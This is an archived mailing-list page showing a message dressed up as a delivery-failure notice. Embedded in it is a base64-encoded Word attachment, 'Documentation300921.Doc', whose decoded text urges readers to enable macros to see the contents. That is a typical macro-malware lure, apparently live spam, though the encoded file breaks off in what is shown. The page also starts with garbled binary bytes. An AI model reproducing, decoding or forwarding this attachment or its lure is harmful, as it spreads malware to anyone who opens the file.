\0\0\0MSWordDoc\0\x10\0\0\0Word.Document.8\0ô9²q\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0P\0R\0O\0J\0E\0C\0T\0w\0m\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\x02\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0m\0\0\0)\0\0\0\0\0\0\0\x01\0C\0o\0m\0p\0O\0b\0j\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12\0\x02\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0n\0\0\0y\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2014-09-30 18:12 postmaster-q/cFvQ9GnvMKy9bYqjDATw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-q/cFvQ9GnvMKy9bYqjDATw @ 2014-09-30 18:12 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 157 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       illon-C6IokrwkAtg@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 222 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 56532 bytes --]

[-- Attachment #1.3.1.1: Type: text/plain, Size: 264 bytes --]


The submission for reference 08\22411871 was successfully received and was not processed.
Check attached copy for more information.

=== This is an automatically generated email. Please do not reply as the email address is not monitored for received mail. ===

[-- Attachment #1.3.1.2: Type: text/plain, Size: 52766 bytes --]

application/octet-stream;
 name="Documentation300921.Doc"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="Documentation300921.Doc"

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAOAAAAAAA
AAAAEAAAOwAAAAEAAAD+////AAAAADcAAAD/////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
///////////////////////////////////spcEAA4AZBAAA+BK/AAAAAAAAEAAAAAAACAAA
EwsAAA4AYmpiajzePN4AAAAAAAAAAAAAAAAAAAAAAAAZBBYANBQAAF60AQBetAEAWAIAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAugAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8A
AAAAAAAAAAAAAAAAAAAAALcAAAAAACIGAAAAAAAAIgYAAIQTAAAAAAAAhBMAAAAAAAD4EwAA
AAAAAPgTAAAAAAAA+BMAABQAAAAAAAAAAAAAAP////8AAAAADBQAAAAAAAAMFAAAAAAAAAwU
AAAAAAAADBQAABQAAAAgFAAAFAAAAAwUAAAAAAAAxBwAADABAAA0FAAAAAAAADQUAAAAAAAA
NBQAAAAAAAA0FAAAAAAAAEoUAAAAAAAAHxYAAAAAAAAfFgAAAAAAAB8WAAAAAAAA1BkAAHEC
AABFHAAAAAAAAEUcAAAAAAAARRwAAAAAAABFHAAAAAAAAEUcAAAAAAAARRwAACQAAAD0HQAA
ogIAAJYgAABEAAAAaRwAABUAAAAAAAAAAAAAAAAAAAAAAAAA+BMAAAAAAAAfFgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAD9FQAAIgAAAB8WAAAAAAAAHxYAAAAAAAAfFgAAAAAAAGkcAAAAAAAA
AAAAAAAAAACEEwAAAAAAAIQTAAAAAAAANBQAAAAAAAAAAAAAAAAAAEoUAACzAQAAfhwAABYA
AABpFgAAAAAAAGkWAAAAAAAAaRYAAAAAAAAfFgAAIgAAAIQTAABSAAAANBQAABYAAAD4EwAA
AAAAAEoUAAAAAAAA1BkAAAAAAAAAAAAAAAAAAGkWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHxYAAAAAAADUGQAAAAAAAAAAAAAAAAAA
aRYAAAAAAABpFgAAHgAAAEwYAAAYAAAA1hMAACIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmBgAAAAAAABKFAAA
AAAAAP////8AAAAAQEzwskbbzwEAAAAAAAAAAAwUAAAAAAAAQRYAAAAAAABkGAAACAAAAAAA
AAAAAAAAwBkAABQAAACUHAAAMAAAAMQcAAAAAAAAbBgAACwAAADaIAAAAAAAAEEWAAAoAAAA
2iAAABAAAACYGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANogAAAAAAAAAAAAAAAAAAD4EwAA
AAAAAJgYAAAoAQAAHxYAAAAAAAAfFgAAAAAAAGkWAAAAAAAAHxYAAAAAAAAfFgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHxYAAAAAAAAfFgAAAAAAAB8WAAAAAAAA
aRwAAAAAAABpHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaRYAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8WAAAAAAAAHxYAAAAAAAAfFgAA
AAAAAMQcAAAAAAAAHxYAAAAAAAAfFgAAAAAAAB8WAAAAAAAAHxYAAAAAAAAAAAAAAAAAAP//
//8AAAAA/////wAAAAD/////AAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAP////8AAAAA
/////wAAAAD/////AAAAAP////8AAAAA/////wAAAAD/////AAAAAP////8AAAAA/////wAA
AAD/////AAAAAP////8AAAAA/////wAAAAD/////AAAAANogAAAAAAAAHxYAAAAAAAAfFgAA
AAAAAB8WAAAAAAAAHxYAAAAAAAAfFgAAAAAAAB8WAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfFgAAAAAAAB8WAAAAAAAA
HxYAAAAAAAAiBgAAKAwAAEoSAAA6AQAABQASAQAAGQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEIDQ0NDQ0NDQ0NDU1pY3Jvc29mdCBPZmZpY2UgMjAx
Mw1UbyBkaXNwbGF5IHRoZSBjb250ZW50cyBvZiB0aGUgZG9jdW1lbnQgY2xpY2sgb24gRW5h
YmxlIENvbnRlbnQgYnV0dG9uLg1NaWNyb3NvZnQgT2ZmaWNlIDIwMTANVG8gZGlzcGxheSB0
aGUgY29udGVudHMgb2YgdGhlIGRvY3VtZW50IGNsaWNrIG9uIEVuYWJsZSBDb250ZW50IGJ1
dHRvbi4NTWljcm9zb2Z0IE9mZmljZSAyMDA3DTEuIFRvIGRpc3BsYXkgdGhlIGNvbnRlbnRz
IG9mIHRoZSBkb2N1bWVudCBjbGljayBvbiBPcHRpb25zIGJ1dHRvbi4NMi4gVGhlbiBzZWxl
Y3QgRW5hYmxlIHRoaXMgY29udGVudCBhbmQgY2xpY2sgb24gT0sgYnV0dG9uLg1NaWNyb3Nv
ZnQgT2ZmaWNlIDIwMDMNMS4gR28gdG8gVG9vbHMgPiBNYWNybyBzdWJtZW51IGFuZCBzZWxl
Y3QgU2VjdXJpdHkuDTIuIFNlbGVjdCBMb3cgb3B0aW9uIGFuZCBjbGljayBvbiBPSyBidXR0
b24uDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NTkUzdjZCQ3JSUlRzYlNGVlpkN0NCWnhHbHRKV0hL
bGt6c1RNQVNyRWFqTzRyeWs4b3ppVmVhSllURG9CbjRFNEQ5WlA2bFZ5TWZXOXhLaFZONmVW
a0hjS1pJNjN2aEhQOVBlVm1IRVYzMUVBeUhFDUF0dGVudGlvbiEgVGhpcyBkb2N1bWVudCB3
YXMgY3JlYXRlZCBieSATIEhZUEVSTElOSyAiaHR0cDovL29mZmljZTM2NS5jb20iIAEUYSBu
ZXdlciB2ZXJzaW9uIG9mIE1pY3Jvc29mdCBPZmZpY2VUTRUuDU1hY3JvcyBtdXN0IGJlIGVu
YWJsZWQgdG8gZGlzcGxheSB0aGUgY29udGVudHMgb2YgdGhlIGRvY3VtZW50Lg0uDQ0NDQ0A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAQgAAAIIAAAMCAAAIAgAACEIAAAiCAAAaggAAIAI
AADICAAA3ggAAFwJAABdCQAAcwkAANQJAADVCQAA1gkAAOgJAABMCgAAVwoAAFgKAACACgAA
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
SgIAUUoCAAAZFmiPI6IAMEoQAENKFgBIKgFPSgIAUUoCABYWaI8jogAwShAAQ0oWAE9KAgBR
SgIAAB4DagAAAAAWaI8jogA+KgFDShYAT0oCAFFKAgBVCAEAIAIIgQNqQBUAAAYIARZojyOi
AD4qAU9KAgBRSgIAVQgBDDIAMZBoATpwIQOhAB+wgi4gsMZBIbDQAiKw0AIjkNACJJDQAiWw
AAAXsMQCGLDEAgyQxAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBUAAEQAZAAAAAAA
AAAKAAAAAAAAAAAAAAAAANYLKQToA+gDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAPAATwcAAAALIECvAIAAAAAQQAAAAKAABzAAvwPgAAAH8AgADhAARBAQAAAD8BAAAGAL8B
AAAQAP8BAAAIAIDDFAAAAL8DAAACACAEOARBBEMEPQQ+BDoEIAA4AAAAEwAi8QYAAACqAwAA
AA8AABDwBAAAAAAAAIBiAAfwfBQAAAYGLfV3Vzk1iYe5YHryofko4/8AWBQAAAEAAABEAAAA
AAABCgBuHvBQFAAALfV3Vzk1iYe5YHryofko4/+JUE5HDQoaCgAAAA1JSERSAAAAygAAAEcI
AwAAAHGVKJwAAAMAUExURQAAAAAAMwAAZgAAmQAAzAAA/wArAAArMwArZgArmQArzAAr/wBV
AABVMwBVZgBVmQBVzABV/wCAAACAMwCAZgCAmQCAzACA/wCqAACqMwCqZgCqmQCqzACq/wDV
AADVMwDVZgDVmQDVzADV/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMr
ADMrMzMrZjMrmTMrzDMr/zNVADNVMzNVZjNVmTNVzDNV/zOAADOAMzOAZjOAmTOAzDOA/zOq
ADOqMzOqZjOqmTOqzDOq/zPVADPVMzPVZjPVmTPVzDPV/zP/ADP/MzP/ZjP/mTP/zDP//2YA
AGYAM2YAZmYAmWYAzGYA/2YrAGYrM2YrZmYrmWYrzGYr/2ZVAGZVM2ZVZmZVmWZVzGZV/2aA
AGaAM2aAZmaAmWaAzGaA/2aqAGaqM2aqZmaqmWaqzGaq/2bVAGbVM2bVZmbVmWbVzGbV/2b/
AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5krAJkrM5krZpkrmZkrzJkr/5lV
AJlVM5lVZplVmZlVzJlV/5mAAJmAM5mAZpmAmZmAzJmA/5mqAJmqM5mqZpmqmZmqzJmq/5nV
AJnVM5nVZpnVmZnVzJnV/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wr
AMwrM8wrZswrmcwrzMwr/8xVAMxVM8xVZsxVmcxVzMxV/8yAAMyAM8yAZsyAmcyAzMyA/8yq
AMyqM8yqZsyqmcyqzMyq/8zVAMzVM8zVZszVmczVzMzV/8z/AMz/M8z/Zsz/mcz/zMz///8A
AP8AM/8AZv8Amf8AzP8A//8rAP8rM/8rZv8rmf8rzP8r//9VAP9VM/9VZv9Vmf9VzP9V//+A
AP+AM/+AZv+Amf+AzP+A//+qAP+qM/+qZv+qmf+qzP+q///VAP/VM//VZv/Vmf/VzP/V////
AP//M///Zv//mf//zP///wAAAAAAAAAAAAAAANn28igAAAD9dFJOU///////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
/////////////////////////////wD2TzQDAAAAAWJLR0QAiAUdSAAAAAxjbVBQSkNtcDA3
MTIAAAADSABzvAAAD8xJREFUaEPtWk1y4zYWtjfSXaSNmI10l85GXFGbzEWyibgJvJk5xHgW
TaZqCLLGFlw1Y18g3rSyMK0qU6Kqu8nNfO8BBEFStrvTSVU6FUiWKBIE3ofv/eHRZ/Wfpp39
aZDUf0H5I3L5Fyt/sfK7roCjYFXtvPiQ319Nc6CUIpVCtn/4IWWqvho0LZRq8/Hjxw/0atr+
Q/G+KOTXQovDyuYA2T/Qm76LPeF4KopkU6uvAk2HlfdAACDvGcv7/Z6wPBXpi0COfxiYDiuH
ayC4ksk13viQ8kpeAcuVrI4wfhb5xMdv4BdKXo0vXhOXlcOH4lpWt+VtpSr1Ed/lNbEi7/Rc
/eaCeA7oCfAV9aURW9nvavhLtPbSs2s3uMD3cHNtZV982G/KiuapaCIcXRErZU1zdZqeGqd1
o1+f+ufex5Bs4+HsmKdHbC6rWzNle4erYP/9sL++Npf0LYerp6dckpTV5rA5QOnIP+OdVnZO
3bMV45UjleFlbrir71QmlKtaShxprAtRh4IHdf8M6Lvqxvf5klJZC73Dyv79Pm0JI9g5XJi8
PdaVvM7zq3x/ne9lIXMpVaefu7YvHme+541nXqg7laHnzTxvgaW6URmfUtOAvhbL+h/6xMkm
/LoMjrUKQ5FiXbSqaygErdrsNStO2xTFw1UKNUj3RV48FDm9czR5MEtJX51VpVXP1Gn3fQxG
3ux8Nh0JnkPMzzzvfHa+BILlmccY1Hx5U9ep59cVvkWY1eCtViLEiNlK1Uc6Vfu+Ep6ohQhD
8Gck0FBYZeHBiJUGCQlYJaRgCqQU4CcvkiIBN/m/c7kpSVl7rRQ+Vn2El+f70BTT7MFqNh1P
cPV8TVcyb0rAQNKxDqbeeEJCKX+Fi37g1/he+9+Fau6H5eL71VKpxTqsAz+cC+XPw5UXYNV8
oXgsaq4HY7MnKGzyjO4KrCDcV3J/9ZD8KCXeMknyPLKK2EAH3QEt8cyb4gNf3rwFo9dNTCD2
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
